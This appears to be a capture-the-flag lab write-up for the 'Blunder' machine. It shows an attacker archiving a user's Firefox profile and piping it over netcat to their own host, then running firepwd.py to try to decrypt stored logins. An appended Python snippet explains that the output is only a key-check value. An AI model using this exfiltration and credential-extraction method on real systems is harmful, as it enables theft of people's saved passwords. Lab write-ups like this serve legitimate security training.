Firefox
hugo@blunder:~$ ll
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 ./
drwxr-xr-x 4 root root 4096 Apr 27 2020 ../
lrwxrwxrwx 1 root root 9 Apr 28 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hugo hugo 220 Nov 28 2019 .bash_logout
-rw-r--r-- 1 hugo hugo 3771 Nov 28 2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 2020 .cache/
drwx------ 11 hugo hugo 4096 Nov 28 2019 .config/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Desktop/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Documents/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Downloads/
drwx------ 3 hugo hugo 4096 Apr 27 2020 .gnupg/
drwxrwxr-x 3 hugo hugo 4096 Nov 28 2019 .local/
drwx------ 5 hugo hugo 4096 Apr 27 2020 .mozilla/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Music/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Pictures/
-rw-r--r-- 1 hugo hugo 807 Nov 28 2019 .profile
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Public/
drwx------ 2 hugo hugo 4096 Apr 27 2020 .ssh/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Templates/
-r-------- 1 hugo hugo 33 sep 18 05:34 user.txt
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Videos/
After making a lateral movement, I found out that the shaun user also has the .mozilla directory present in the home directory.
shaun@blunder:~$ ll .mozilla
ll .mozilla
total 20K
4.0K drwxr-xr-x 16 shaun shaun 4.0K Jul 6 2021 ..
4.0K drwxr-xr-x 5 shaun shaun 4.0K Nov 28 2019 .
4.0K drwx------ 2 shaun shaun 4.0K Nov 28 2019 extensions
4.0K drwx------ 2 shaun shaun 4.0K Nov 28 2019 systemextensionsdev
4.0K drwxr-xr-x 7 shaun shaun 4.0K Nov 28 2019 firefox
shaun@blunder:~$ ll .mozilla/firefox
ll .mozilla/firefox
total 36K
4.0K drwx------ 13 shaun shaun 4.0K Jul 5 2021 ekbzf12k.default-release
4.0K drwx------ 3 shaun shaun 4.0K May 19 2020 'Crash Reports'
4.0K drwxr-xr-x 5 shaun shaun 4.0K Nov 28 2019 ..
4.0K drwxr-xr-x 7 shaun shaun 4.0K Nov 28 2019 .
4.0K -rw-r--r-- 1 shaun shaun 62 Nov 28 2019 installs.ini
4.0K -rw-r--r-- 1 shaun shaun 259 Nov 28 2019 profiles.ini
4.0K drwx------ 2 shaun shaun 4.0K Nov 28 2019 yoop1eyl.default
4.0K drwx------ 2 shaun shaun 4.0K Nov 28 2019 'Pending Pings'
4.0K drwxr-xr-x 4 shaun shaun 4.0K Nov 28 2019 mhex3b0n.default-release
The user has a Firefox profile: ekbzf12k.default-release.
If the user has ever authenticated, I will be able to extract the credentials.
shaun@blunder:~$ tar -czf firefox.tar.gz .mozilla/firefox
shaun@blunder:~$ nc 10.10.14.17 2222 < firefox.tar.gz
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/shaun]
└─$ nnc 2222 > firefox.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56112
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/shaun]
└─$ tar -xf firefox.tar.gz
Transfer complete
firepwd.py
┌──(kali㉿kali)-[~/…/htb/labs/blunder/firepwd]
└─$ python3 firepwd.py -d shaun/.mozilla/firefox/ekbzf12k.default-release
globalSalt: b'ef3b6c7f747609825ffe34d128a396f339bf506c'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.12.5.1.3 pbeWithSha1AndTripleDES-CBC
SEQUENCE {
OCTETSTRING b'928443fce73564e550c2b2e779c95569b2efadb7'
INTEGER b'01'
}
}
OCTETSTRING b'67ce08b7061abf780284ce3cdf7a5742'
}
entrySalt: b'928443fce73564e550c2b2e779c95569b2efadb7'
b'70617373776f72642d636865636b0202'
password check? True
no saved login/password
firepwd.py was able to decrypt the encrypted string, but the result doesn’t appear to be “CLEARTEXT”: 70617373776f72642d636865636b0202
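How to read that output, as an added example that is not part of the original write-up or of firepwd itself: the unlabelled hex line is hex-encoded ASCII, the string password-check followed by two PKCS#7 padding bytes, which is the key-check value that "password check? True" refers to and not a stored credential. The function names are hypothetical, and the sample lines are copied from the run above.

```python
import re

CHECK_MARKER = b"password-check"   # expected plaintext of the key-check value
BLOCK_SIZE = 8                     # 3DES-CBC block size (pbeWithSha1AndTripleDES-CBC)

# Lines copied from the firepwd run shown above.
SAMPLE = """\
entrySalt: b'928443fce73564e550c2b2e779c95569b2efadb7'
b'70617373776f72642d636865636b0202'
password check? True
no saved login/password
"""

def pkcs7_unpad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Strip PKCS#7 padding; raise ValueError if the padding is malformed."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if not 1 <= n <= block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return data[:-n]

def interpret_firepwd_output(text: str) -> dict:
    """Summarise what the run recovered: check value, padding, saved logins."""
    result = {"check_plaintext": None, "padding_len": None,
              "is_check_marker": False, "password_check": False,
              "no_saved_logins": False}
    for line in (l.strip() for l in text.splitlines()):
        bare_hex = re.fullmatch(r"b'((?:[0-9a-fA-F]{2})+)'", line)
        if bare_hex:  # unlabelled hex line = decrypted check value
            raw = bytes.fromhex(bare_hex.group(1))
            try:
                plain = pkcs7_unpad(raw)
            except ValueError:
                continue  # not a padded block; leave the fields unset
            result["check_plaintext"] = plain
            result["padding_len"] = len(raw) - len(plain)
            result["is_check_marker"] = plain == CHECK_MARKER
        elif line == "password check? True":
            result["password_check"] = True
        elif line == "no saved login/password":
            result["no_saved_logins"] = True
    return result

if __name__ == "__main__":
    for key, value in interpret_firepwd_output(SAMPLE).items():
        print(f"{key}: {value}")
```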